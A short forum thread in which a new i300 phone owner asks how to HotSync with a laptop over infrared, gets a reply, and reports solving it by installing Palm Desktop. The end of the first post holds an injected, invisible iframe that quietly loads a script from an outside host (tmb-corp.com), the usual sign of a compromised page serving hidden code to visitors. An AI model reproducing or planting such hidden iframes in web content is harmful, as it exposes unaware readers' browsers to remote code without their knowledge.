sync without a craddle? IR?

Hey,

I'm glad to have stumbled accross this board...

I just got a new i300 via a killer deal on ebay. I'm embarassed to say this is my first experience with a palm, much less one built in to a phone.

Anyway, the package I got didn't come with the hot sync craddle, just a travel charger. I'll probably pick one up sooner or later but would like to try to make do without it for now.

What I'm wondering is if I can sync using my laptop's IR port. I can set the phone to sync and place it in line with the laptop and it will recognize it (using WinXP) but can't transfer, saying that the device blocked the connection. Are there any programs out there that I can use to make this work?

Thanks ahead of time for your repplies!<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I used to sync my I300 with the IR all the time ... my laptop doesn't have a serial connection ... just USB's ... so I did the IR hot sync ... you have to set it up via the Hot Sync settings to do this ... to be honest .. I kinda forget how but it can be done ... I think it's every bit as fast as the cradle ..

Thanks! I actually already figured it out. It was as easy as just downloading the palm desktop software and configuring it. Took all of about 3 minutes once I knew the software existed! (Told you I was new to this!)

Thanks!

I'm really loving this phone. I've only had it for 2 days and I haven't put it down yet.

I really like the fact that I can just hit sync and lay it next to my computer and the IR port just picks it up and takes care of everything by itself.
